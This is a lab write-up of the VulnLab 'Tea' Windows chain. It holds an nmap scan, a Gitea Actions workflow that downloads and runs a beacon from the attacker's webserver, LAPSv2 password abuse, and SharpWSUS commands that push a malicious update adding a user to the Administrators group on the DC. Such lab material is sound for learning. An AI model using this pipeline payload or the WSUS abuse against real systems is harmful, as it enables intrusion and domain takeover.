Vulnlab - Tea Writeup

👾 Machine Overview

This is a writeup of the chain Tea from VulnLab, it’s a medium difficulty Windows chain which featured CI/CD pipeline exploitation, LAPS2, and WSUS.

🔍 Enumeration

An initial nmap scan of the hosts gave the following results:

nmap -sV -sC -Pn -iL hosts.list -oA initial-scan     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-07 16:37 EST
Nmap scan report for 10.13.38.53
Host is up (0.030s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-07 21:37:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tea.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Not valid before: 2025-12-05T19:11:22
|_Not valid after:  2026-06-06T19:11:22
|_ssl-date: 2025-12-07T21:38:39+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: TEA
|   NetBIOS_Domain_Name: TEA
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: tea.vl
|   DNS_Computer_Name: DC.tea.vl
|   DNS_Tree_Name: tea.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-12-07T21:37:59+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-07T21:37:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s

Nmap scan report for 10.13.38.54
Host is up (0.032s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3000/tcp open  http          Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=42bf0591d389798b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=xO-EchSPM80IhsNlIx8Q2siViWI6MTc2NTE0MzQ1NzIwMzczMDEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 07 Dec 2025 21:37:37 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Gitea: Git with a cup of tea</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL3Nydi50ZWEudmw6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL3Nydi50ZWEudmw6MzAwMC9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpemVzIjo
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=0f6d85eb095b9445; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=D7vFZtG7cUMpfX7LjC7OSMKScks6MTc2NTE0MzQ1ODAzNTQ5NjYwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 07 Dec 2025 21:37:38 GMT
|_    Content-Length: 0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=SRV.tea.vl
| Not valid before: 2025-12-05T19:11:22
|_Not valid after:  2026-06-06T19:11:22
| rdp-ntlm-info: 
|   Target_Name: TEA
|   NetBIOS_Domain_Name: TEA
|   NetBIOS_Computer_Name: SRV
|   DNS_Domain_Name: tea.vl
|   DNS_Computer_Name: SRV.tea.vl
|   DNS_Tree_Name: tea.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-12-07T21:37:59+00:00
|_ssl-date: 2025-12-07T21:38:39+00:00; +2s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time: 
|   date: 2025-12-07T21:38:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 77.62 seconds

We’re presented with a DC, and a Gitea server. Both hosts have remote access ports like RDP accessible as well.

I checked for anonymous SMB/LDAP/RPC access but didn’t have any luck, so I decided to pivot to the Gitea server.

🍵 Gitea Runner Exploitation

Before checking out the site I added both DC.tea.vl and SRV.tea.vl to my /etc/hosts.

The server proudly proclaims that it’s running version 1.21.1 - I wasn’t able to find any interesting exploits/vulnerabilities for this version.

Open registration was enabled, so I used this to register a new user and login. The “Explore” page can be used to check out public repositories, but I didn’t see any content of interest here.

Checking out the Gitea settings, it looks like the SRV host has been setup as a Gitea runner for CI/CD pipelines or “Actions”.

Runners can be used to execute CI/CD pipelines that do things like build releases when code is pushed, or run linting checks. It’s best practice to have these runners execute code in docker containers, but it’s possible to have code executed on the underlying host.

Here this runner is tagged as Global - this means that it should be available to run code for all repositories. We should be able to add a pipeline to a test repository and have it execute some code.

I created a test repository to start. In the repo settings you have to select Enable Repostiory Actions to have a pipeline run.

Next, I pushed a test pipeline to .gitea/workflows/pipeline.yml. This workflow should run when any push is made to the repository, and it runs some basic recon commands to determine what user we’re running as, information about the host, etc.

In the actions tab we can see this execute as thomas.wallace on SRV.tea.vl - this runner is misconfigured to execute things as the logged in user on the actual host and not in a container.

To turn this into a session, I pushed a new pipeline to download and execute a Sliver beacon hosted on a webserver from my attacker VM.

name: Run Executable
run-name: ${{ gitea.actor }} executing binary

on:
  push:
  workflow_dispatch:

jobs:
  run-exe:
    runs-on: windows-latest

    steps:

      - name: Download executable
        shell: powershell
        run: |
          Invoke-WebRequest -Uri "[your URL]" -OutFile "C:\Windows\Temp\updater.exe"

      - name: Run executable
        shell: powershell
        run: |
          Start-Process -FilePath "C:\Windows\Temp\updater.exe" -NoNewWindow -Wait

In the actions tab we can see it run after pushing.

There’s an initial callback to my webserver to download the beacon.

And finally a session as thomas.wallace!

I used this to grab the first flag from C:\Users\thomas.wallace\Desktop\flag.txt.

🧔 Thomas

Now as Thomas I started to perform some recon to see how we can escalate. I started off by checking out our privileges, what was running on the host, running PrivEscCheck, etc.

Notably I saw the presence of C:\WSUS-Updates, indicating that this host is likely a WSUS server. Additionally PrivEscCheck flagged that LAPS was enabled.

We are in two interesting groups: Developers, and Server Administration. I ran SharpHound through the beacon to get some more info on the domain.

Looking in BloodHound there’s not a lot of interesting privileges. Pathfinding draws a blank - and our interesting groups have no outbound control. This leads me to think that any interesting privileges from these groups may be granted via GPO.

There was a Gitea service account which I roasted - but the password failed to crack with rockyou or some of the SecLists wordlists.

💻 LAPS

The Local Administrator Password Solution (LAPS) is a Microsoft tool that can be used to automatically manage the local administrator passwords of hosts in AD. It can be used to randomly generate unique passwords for each host which are rotated, and it ensures only users in authorized groups can access these credentials.

Checking out GPO, there is a LAPS GPO which affects the Servers OU and our SRV host.

If we pull the content of this policy, we can see that there’s a SID mapped to the ADPasswordEncrytionPrincipal field.

This is the SID for our Server Administration group that Thomas is in.

This means that members of the Server Administration group are able to view and decrypt the LAPS password for SRV.

With the release of LAPS version 2, passwords are now stored in the msLAPS-EncryptedPassword and msLAPS-Password properties instead of the old ms-Mcs-AdmPwd field. This means that older tools like LAPSToolKit won’t work in this environment.

Adam Chester has a blog explaining LAPSv2 and building a tool to decrypt LAPS passwords which we can use to access the local admin password for SRV as Thomas.

I verified the credentials using nxc, and then used them to grab our next flag and drop a beacon as system on SRV.

🆙 WSUS

Windows Server Update Services (WSUS) is used to deploy updates and patches to systems in AD. Now as system on SRV we can use SharpWSUS to enumerate information about the WSUS server.

It looks like this is in fact our WSUS server, and we can see that the domain controller is enrolled as a WSUS client. This means that we can push a malicious update to execute code on that system.

The updates do need to use legitimate signed MSFT binaries, so we can use PsExec64.exe from the SysInternals Suite to add our user Thomas to the domain admins group.

After uploading PsExec to SRV, we can use SharpWSUS to create a malicious patch to do this.

.\SharpWSUS.exe create /payload:"C:\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c net localgroup Administrators thomas.wallace /add" /title:"NewAccountUpdate"

We’ll then need to approve the patch with the generated command to target the DC.

.\SharpWSUS.exe approve /updateid:[your id] /computername:DC.tea.vl /groupname:"UpdateGroup"

If you check the status at this point - the update will have not worked. This is due to a problem with SharpWSUS where the update binary ends up being placed in the wrong directory. There’s a PR open to fix this - but you can also just manually move the file to the correct location.

I RDP’d into the box and opened the WSUS console to take a closer look.

Here we can see the update failed to deploy because the file failed to download. We can pull event 364 from the event log to see where the file is expected.

Get-WinEvent -LogName Application | Where-Object { $_.Id -eq 364 } |fl

After moving it to the right location, we can retry the download in the WSUS console.

It takes a couple minutes, but eventually it’ll run and deploy to the DC and promote Thomas to a DA.

Yippee!! We can use this to snag the last flag :)

📖 Resources

🔗 Hyperlink	ℹ️ Info
SharpWSUS	Tool for enumerating & interacting with WSUS
techspence/SharpWSUS	SharpWSUS fork which fixes a common problem
LRQA	SharpWSUS blog post
SysInternals	Signed MSFT binaries for use with WSUS patches
My WSUS Notes	My notes on WSUS enum & exploitation
My Gitea Pipeline Notes	My notes on exploiting Gitea pipelines
My LAPS Notes	My notes on LAPS enum & exploitation